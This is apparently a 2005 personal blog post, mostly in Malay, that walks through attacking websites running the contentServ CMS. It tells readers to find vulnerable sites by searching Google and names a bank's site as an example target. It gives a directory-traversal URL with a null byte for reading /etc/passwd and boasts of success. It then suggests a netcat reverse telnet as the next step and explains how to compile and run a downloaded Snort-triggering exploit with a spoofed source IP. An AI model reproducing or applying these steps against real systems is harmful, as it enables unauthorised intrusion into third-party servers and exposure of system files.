Tuesday, September 27, 2005

Read /etc/passwd from contentServ Vuln.

in Bahasa
(cuba ushar http://www.packetstormsecurity.org ruangan exploit)

Sistem yang menggunakan contentServ yang disyaki mempunyai vuln.
contentServ tu salah satu cms.
cms tu content management system, satu sistem portal yang telah disiapkan utk user buat sendiri isi portal tsbt.

kemdian googlekan utk cari laman web mana yang pakai contentServ nih..
contohnya


Gebhard Bank » ad-hoc-Meldung vom 15.07.2005: Gebhard Bank weist ... - [ Translate this page ]
www.gebhardbank.de/contentserv/3.1/gebhardbank.de/index.php?StoryID=2291 - Similar pages
[ More results from www.gebhardbank.de ]


next step taip jer tambahan (yg diceritakan dalam packetstorm itu) kelihatan spt ini
http://www.gebhardbank.de/contentserv/3.1/..../etc/passwd%00

oops.gif dah boleh baca /etc/passwd nyer ker.. hehehehe

okaylah next step, mungkin kita boleh pakai reverse telnet

nota sendiri:
reverse telnet adalah salah satu teknik untuk attacker memasuki ruang sistem dengan memberi arahan kepada sistem yang hendak dimasuki (contohnya oleh en. suki) membuat telnet ke atas sistem attacker yang di pasang tool untuk reverse telnet ini. contoh tool utk reverse telnet ini ialah netcat (nc)

Exploit Compiling (on C language)

1. get the exploit
(eg. http://www.packetstormsecurity.org/0509-ex.../snortrigger.c)

2. run gcc on ur linux (or whatever c-compiler)
[root@kambing]# gcc snortrigger.c

3. redi tu yus
[root@kambing]# ./a.out
Usage: ./a.out [spoofed srcip]
Default srcip = 200.31.33.70